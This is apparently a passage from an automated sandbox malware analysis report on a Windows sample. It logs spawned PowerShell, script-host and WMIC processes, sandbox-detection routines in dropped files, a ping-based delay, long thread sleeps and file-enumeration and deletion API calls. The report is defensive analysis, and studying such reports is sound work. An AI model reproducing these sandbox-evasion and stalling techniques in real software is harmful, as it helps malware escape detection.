              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_7-106959
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeMemory allocated: C40000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeMemory allocated: 2780000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeMemory allocated: 4780000 memory reserve | memory write watch
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 703Jump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeWindow / User API: threadDelayed 6928
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeWindow / User API: threadDelayed 3067
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7001
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2690
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6920
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2687
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6905
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2195
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7838
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1814
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comAPI coverage: 3.8 %
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comAPI coverage: 3.7 %
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comAPI coverage: 3.7 %
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe TID: 2516Thread sleep count: 6928 > 30
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe TID: 2516Thread sleep time: -6928000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe TID: 2516Thread sleep count: 3067 > 30
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe TID: 2516Thread sleep time: -3067000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe TID: 2564Thread sleep count: 160 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4412Thread sleep count: 7001 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4412Thread sleep count: 2690 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5956Thread sleep time: -7378697629483816s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5292Thread sleep count: 6920 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3904Thread sleep count: 2687 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3804Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5916Thread sleep count: 6905 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2896Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3384Thread sleep count: 2195 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 396Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5432Thread sleep count: 7838 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1456Thread sleep count: 1814 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3132Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\System32\wscript.exe TID: 512Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\wscript.exe TID: 6792Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
              Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_00409A19 ??2@YAPAXI@Z,FindFirstFileW,FindClose,0_2_00409A19
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_004044EA FindFirstFileW,FindClose,SetLastError,CompareFileTime,0_2_004044EA
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_0040340F FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_0040340F
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_0040352A FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,0_2_0040352A
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C9E334 GetFileAttributesW,FindFirstFileW,FindClose,7_2_00C9E334
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CAA32C FindFirstFileW,Sleep,FindNextFileW,FindClose,7_2_00CAA32C
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CA65AE FindFirstFileW,FindNextFileW,FindClose,7_2_00CA65AE
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CA72A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,7_2_00CA72A6
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CA7205 FindFirstFileW,FindClose,7_2_00CA7205
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C9D7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_00C9D7CC
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C9DB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_00C9DB0B
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CA9E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_00CA9E43
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CA9F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_00CA9F9E
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A6E334 GetFileAttributesW,FindFirstFileW,FindClose,10_2_00A6E334
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A7A32C FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00A7A32C
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A765AE FindFirstFileW,FindNextFileW,FindClose,10_2_00A765AE
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A772A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,10_2_00A772A6
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A77205 FindFirstFileW,FindClose,10_2_00A77205
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A6D7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00A6D7CC
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A6DB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00A6DB0B
